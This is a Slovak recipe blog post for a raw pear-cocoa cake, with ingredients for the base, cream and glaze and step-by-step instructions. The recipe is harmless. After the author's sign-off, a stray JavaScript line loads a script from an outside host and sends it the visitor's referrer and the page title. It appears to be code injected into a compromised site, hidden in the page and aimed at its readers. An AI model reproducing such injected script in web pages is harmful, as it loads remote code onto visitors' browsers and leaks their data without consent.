FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Raw hruškovo-kakaová torta

Raw hruškovo-kakaová torta

22/12/2014 by Martina

Opäť som túžila vytvoriť niečo, čo som ešte neskúšala a zároveň to pre mňa predstavovalo určitú výzvu…

Raw koláče sú teraz veľmi v móde, tak som sa rozhodla vytvoriť niečo populárne a špeciálne zároveň! Raw koláče nie sú len o sušenom ovocí, orechoch a príchuti… Predstavovala som si niečo čerstvé, nápadité, svieže, ale zároveň s chuťou tohoto krásneho obdobia. A vtedy som si spomenula na krásne zrelé hrušky, ktoré čakajú na zjedenie v košíku.

Myšlienka, že by sa mi podarilo ich rozmixovať bez toho, že ich predtým udusím mi najprv prišla nemožná. Ale keď to dokáže vitamix, prečo by to neurobil aj môj storočný kuchynský robot z čias, keď som ešte nebola na svete? A naozaj sa mu to podarilo! Pridala som trochu datlí, škoricu a chia semiačka. Vznikol úžasne svieži krém s vôňou Vianoc.

K nemu som pripravila ten klasický raw korpus z ďatlí a orechov. Aby nebol len taký obyčajný, doplnila som ho o raw kakao a prekvapivo zdravé konopné semiačka.

Dotvorila som ho polevou z kokosového oleja, raw kakaa a kokosového nektáru – úplná topka na koniec!

Ingrediencie:

korpus:

    • 100g datlí (čerstvé alebo sušené)
    • 100g vlašských orechov
    • 2 lyžice lúpaných konopných semiačok (presne týchto)
    • 1 lyžica raw kakaa

krém:

  • 3 zrelé hrušky
  • 100g datlí (čerstvé alebo sušené)
  • 1 lyžička škorice
  • 3 lyžice chia semiačok

poleva:

  • 2 lyžice virgin kokosového oleja
  • 1 lyžica raw kakaa
  • 1 lyžica kokosového nektáru (napríklad tento)

+ konopné semiačka na posypanie

Postup:

    1. Všetky ingrediencie na korpus dáme do robota a mixujeme, kým sa hmota nezačne podobať lepkavému tuhému cestu.
    2. Tortovú formu vystelieme potravinárskou fóliou a na spodok hmotu rovnomerne utľapkáme.
    3. Plnku pripravíme veľmi podobne. Umyté, nakrájane hrušky dáme do kuchynského robota (blendera) a mixujeme na ovocnú dreň. Pridáme škoricu a datle a mixujeme ďalej.
    4. Keď sa hmota stane homogénnou, prelejeme ju cez sitko, aby sme sa zbavili šupiek a prípadných zrniečok.
    5. Do plnky pridáme chia a miešame, kým nezačne hustnúť ako pri chia pudingu.
    6. Plnku nalejeme na korpus a dáme do mrazničky na cca 1 hodinu.
    7. Polevu si pripravíme tak, že do roztopeného kokosového oleja pridáme kakao a nektár. Dobre premiešame a vylejeme na stuhnutú tortu.
    8. Poleva okamžite stuhne :). Môžeme podávať a skladujeme v chladničke.

IMG_6993

tip: Najlepšie sa krája ohriatym nožom.

M.

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share this:

  • Facebook
  • Pinterest

Related

Filed Under: Recepty, Sladké potešenia Tagged With: GF, LF, Paleo, Raw, Vegan

« Voňavý vianočny koláč
Guacamole »
  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Najnovšie

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Kontakt

Ochutnaj

Brokolicovo-hlivové ragú s grilovaným ovčím syrom

Copyright © 2021 · Tasteful theme by Restored 316